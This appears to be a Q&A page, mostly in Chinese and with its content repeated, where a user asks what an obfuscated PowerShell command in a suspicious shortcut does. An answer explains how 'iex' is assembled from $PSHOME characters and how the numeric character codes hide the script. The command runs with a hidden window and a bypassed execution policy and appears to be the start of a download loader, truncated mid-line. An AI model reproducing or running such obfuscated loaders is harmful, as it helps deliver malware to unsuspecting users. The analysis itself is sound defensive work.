Powershell 加入拼图
Powershell Join Puzzle
有谁知道下面的powershell是干什么的?我发现了一个似乎是恶意的快捷方式,它的目标是:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116
查看我的其他 answer. Compare to the other answer iex (=Invoke-Expression) 是通过 $PSHOME 变量 (= $pshOmE[4]+$PShoMe[30]+'X') 构建的。 join 命令中的数字可能包含扩展的 ASCII 字符,或者它们可能是 Base64 编码的命令,可以通过 powershell.exe -encodedCommand $encodedCommand 在表单中使用(键入 powershell.exe /?,并将转储一个例子)。
希望对您有所帮助
有谁知道下面的powershell是干什么的?我发现了一个似乎是恶意的快捷方式,它的目标是:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116
查看我的其他 answer. Compare to the other answer iex (=Invoke-Expression) 是通过 $PSHOME 变量 (= $pshOmE[4]+$PShoMe[30]+'X') 构建的。 join 命令中的数字可能包含扩展的 ASCII 字符,或者它们可能是 Base64 编码的命令,可以通过 powershell.exe -encodedCommand $encodedCommand 在表单中使用(键入 powershell.exe /?,并将转储一个例子)。
希望对您有所帮助